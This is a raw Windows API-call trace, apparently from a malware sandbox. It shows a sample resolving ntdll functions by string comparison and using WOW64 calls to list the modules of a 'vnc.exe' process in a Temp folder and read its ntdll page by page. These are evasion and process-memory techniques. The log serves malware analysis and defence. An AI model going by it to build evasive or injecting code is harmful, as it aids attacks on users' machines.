[0134.027] lstrcmpA (lpString1="NtFlushWriteBuffer", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFreeUserPhysicalPages", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFreeVirtualMemory", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFreezeRegistry", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtFreezeTransactions", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtFsControlFile", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetCachedSigningLevel", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetCompleteWnfStateSubscription", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetContextThread", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetCurrentProcessorNumber", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetCurrentProcessorNumberEx", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetDevicePowerState", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetMUIRegistryInfo", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetNextProcess", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetNextThread", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetNlsSectionPtr", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetNotificationResourceManager", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetTickCount", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtGetWriteWatch", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtImpersonateAnonymousToken", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtImpersonateClientOfPort", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtImpersonateThread", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtInitializeEnclave", lpString2="ZwGetContextThread") returned -1 [0134.028] lstrcmpA (lpString1="NtInitializeNlsFiles", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtInitializeRegistry", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtInitiatePowerAction", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtIsProcessInJob", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtIsSystemResumeAutomatic", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtIsUILanguageComitted", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtListenPort", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLoadDriver", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLoadEnclaveData", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLoadKey", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLoadKey2", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLoadKeyEx", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLockFile", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLockProductActivationKeys", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLockRegistryKey", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtLockVirtualMemory", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtMakePermanentObject", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtMakeTemporaryObject", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtManagePartition", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtMapCMFModule", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtMapUserPhysicalPages", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtMapUserPhysicalPagesScatter", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtMapViewOfSection", lpString2="ZwGetContextThread") returned -1 [0134.029] lstrcmpA (lpString1="NtModifyBootEntry", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtModifyDriverEntry", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtNotifyChangeDirectoryFile", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtNotifyChangeKey", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtNotifyChangeMultipleKeys", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtNotifyChangeSession", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenDirectoryObject", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenEnlistment", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenEvent", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenEventPair", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenFile", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenIoCompletion", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenJobObject", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenKey", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenKeyEx", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenKeyTransacted", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenKeyTransactedEx", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenKeyedEvent", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenMutant", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenObjectAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0134.030] lstrcmpA (lpString1="NtOpenPartition", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenPrivateNamespace", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenProcess", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenProcessToken", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenProcessTokenEx", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenResourceManager", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenSection", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenSemaphore", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenSession", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenSymbolicLinkObject", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenThread", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenThreadToken", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenThreadTokenEx", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenTimer", lpString2="ZwGetContextThread") returned -1 [0134.031] lstrcmpA (lpString1="NtOpenTransaction", lpString2="ZwGetContextThread") returned -1 [0134.032] lstrcmpA (lpString1="NtOpenTransactionManager", lpString2="ZwGetContextThread") returned -1 [0134.032] lstrcmpA (lpString1="NtPlugPlayControl", lpString2="ZwGetContextThread") returned -1 [0134.032] VirtualFree (lpAddress=0xa90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.046] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0134.047] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0134.047] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19efb8, ProcessInformationLength=0x30, ReturnLength=0x19f010 | out: ProcessInformation64=0x19efb8, ReturnLength=0x19f010) returned 0x0 [0134.047] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0134.087] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0134.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0134.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0134.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.088] LocalFree (hMem=0x629120) returned 0x0 [0134.088] LocalFree (hMem=0x61df68) returned 0x0 [0134.088] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0134.089] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0134.089] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0134.089] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19efb8, ProcessInformationLength=0x30, ReturnLength=0x19f010 | out: ProcessInformation64=0x19efb8, ReturnLength=0x19f010) returned 0x0 [0134.089] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0134.089] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0134.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0134.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0134.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e18a8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x58 | out: Buffer=0x0, NumberOfBytesRead=0x58) returned 0x0 [0134.090] StrRChrA (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpEnd=0x0, wMatch=0x5c) returned="\\vnc.exe" [0134.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e19f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0134.090] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0134.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2290, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0134.090] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0134.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2570, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0134.090] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0134.091] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0134.091] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2090, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0134.091] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0134.091] LocalFree (hMem=0x629120) returned 0x0 [0134.091] LocalFree (hMem=0x61df68) returned 0x0 [0134.165] lstrcmpiA (lpString1="vnc.exe", lpString2="NTDLL.DLL") returned 1 [0134.165] StrChrA (lpStart="vnc.exe", wMatch=0x2e) returned=".exe" [0134.165] lstrcmpiA (lpString1="vnc", lpString2="NTDLL.DLL") returned 1 [0134.165] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0134.166] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.166] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xa90000 [0134.167] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xa90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.167] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xa91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.167] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xa92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.167] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xa93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.168] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xa94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.168] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xa95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.168] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xa96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.168] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xa97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.168] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xa98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.169] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xa99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.169] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xa9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.169] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xa9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.169] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xa9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.170] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xa9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.170] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xa9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.170] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xa9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.170] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xaa0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.171] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xaa1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.171] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xaa2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.171] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xaa3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.171] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xaa4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.171] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xaa5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.173] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xaa6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.173] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xaa7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.174] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xaa8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.174] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xaa9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.174] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xaaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.174] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xaab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.175] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xaac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.175] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xaad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.175] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xaae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.175] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xaaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.176] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xab0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.176] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xab1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.176] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xab2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.176] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xab3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.177] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xab4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.177] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xab5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.177] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xab6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.177] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xab7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.177] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xab8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.178] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xab9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.178] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xaba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.178] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xabb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.178] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xabc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.178] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xabd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.179] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xabe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.179] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xabf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.179] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xac0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.179] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xac1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.180] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xac2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.180] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xac3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.180] 